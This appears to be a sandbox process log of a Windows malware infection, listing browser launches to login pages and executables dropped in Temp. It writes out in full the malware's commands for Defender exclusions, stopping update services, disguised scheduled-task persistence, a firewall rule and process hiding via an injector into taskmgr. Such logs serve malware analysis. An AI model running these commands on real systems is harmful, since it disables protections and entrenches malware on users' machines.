"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\CF47.exe

C:\Users\Admin\AppData\Local\Temp\CF47.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D062.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\D10E.exe

C:\Users\Admin\AppData\Local\Temp\D10E.exe

C:\Users\Admin\AppData\Local\Temp\D1EA.exe

C:\Users\Admin\AppData\Local\Temp\D1EA.exe

C:\Users\Admin\AppData\Local\Temp\D353.exe

C:\Users\Admin\AppData\Local\Temp\D353.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3596 -ip 3596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\D603.exe

C:\Users\Admin\AppData\Local\Temp\D603.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3976 -ip 3976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x48,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9228 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\FDD0.exe

C:\Users\Admin\AppData\Local\Temp\FDD0.exe

C:\Users\Admin\AppData\Local\Temp\3.exe

C:\Users\Admin\AppData\Local\Temp\3.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9896 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x304 0x3e4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9836 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\113A.exe

C:\Users\Admin\AppData\Local\Temp\113A.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\163D.exe

C:\Users\Admin\AppData\Local\Temp\163D.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\1A93.exe

C:\Users\Admin\AppData\Local\Temp\1A93.exe

C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp" /SL5="$30256,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\2003.exe

C:\Users\Admin\AppData\Local\Temp\2003.exe

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 8936 -ip 8936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8936 -s 572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

